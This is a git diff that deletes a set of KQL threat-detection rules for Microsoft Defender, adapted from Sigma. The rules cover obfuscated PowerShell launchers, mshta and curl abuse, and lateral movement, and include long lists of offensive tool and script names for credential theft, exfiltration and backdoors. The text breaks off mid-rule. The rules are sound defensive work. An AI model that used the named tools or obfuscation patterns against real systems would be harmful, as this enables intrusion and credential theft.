--- a/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of stdin to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql b/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
deleted file mode 100644
index e1957d0c..00000000
--- a/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_VAR+_Launcher.kql b/Execution/Invoke-Obfuscation_VAR+_Launcher.kql
deleted file mode 100644
index c5c03061..00000000
--- a/Execution/Invoke-Obfuscation_VAR+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/15
-// Level: high
-// Description: Detects Obfuscated use of Environment Variables to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Stdin.kql b/Execution/Invoke-Obfuscation_Via_Stdin.kql
deleted file mode 100644
index c7d99e0d..00000000
--- a/Execution/Invoke-Obfuscation_Via_Stdin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects Obfuscated Powershell via Stdin in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*""
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Use_Clip.kql b/Execution/Invoke-Obfuscation_Via_Use_Clip.kql
deleted file mode 100644
index b66ecade..00000000
--- a/Execution/Invoke-Obfuscation_Via_Use_Clip.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/09
-// Level: high
-// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)"
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql b/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql
deleted file mode 100644
index 7041f5ee..00000000
--- a/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nikita Nazarov, oscd.community
-// Date: 2020/10/08
-// Level: high
-// Description: Detects Obfuscated Powershell via use MSHTA in Scripts
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)"
\ No newline at end of file
diff --git a/Execution/Java_Running_with_Remote_Debugging.kql b/Execution/Java_Running_with_Remote_Debugging.kql
deleted file mode 100644
index f9e528bc..00000000
--- a/Execution/Java_Running_with_Remote_Debugging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
-// Tags: attack.t1203, attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost")))
\ No newline at end of file
diff --git a/Execution/Local_File_Read_Using_Curl.EXE.kql b/Execution/Local_File_Read_Using_Curl.EXE.kql
deleted file mode 100644
index f838af05..00000000
--- a/Execution/Local_File_Read_Using_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql b/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql
deleted file mode 100644
index 5749cb76..00000000
--- a/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/06
-// Level: medium
-// Description: Detects password change for the logged-on user's via "ksetup.exe"
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/Execution/MMC20_Lateral_Movement.kql b/Execution/MMC20_Lateral_Movement.kql
deleted file mode 100644
index 4c7b0b92..00000000
--- a/Execution/MMC20_Lateral_Movement.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
-// Date: 2020/03/04
-// Level: high
-// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
-// Tags: attack.execution, attack.t1021.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/Execution/MSHTA_Suspicious_Execution_01.kql b/Execution/MSHTA_Suspicious_Execution_01.kql
deleted file mode 100644
index 280ba986..00000000
--- a/Execution/MSHTA_Suspicious_Execution_01.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
-// Date: 2019/02/22
-// Level: high
-// Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
-// Tags: attack.defense_evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020.1599
-DeviceProcessEvents
-| where (ProcessCommandLine contains "vbscript" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains ".dll") and FolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql b/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql
deleted file mode 100644
index 9385195f..00000000
--- a/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: John Lambert (rule)
-// Date: 2019/01/16
-// Level: high
-// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains "AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql b/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
deleted file mode 100644
index dd255075..00000000
--- a/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: high
-// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
-// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql b/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql
deleted file mode 100644
index 248f9cd5..00000000
--- a/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
-// Date: 2018/04/07
-// Level: high
-// Description: Detects the creation of known offensive powershell scripts used for exploitation
-// Tags: attack.execution, attack.t1059.001
-DeviceFileEvents
-| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath 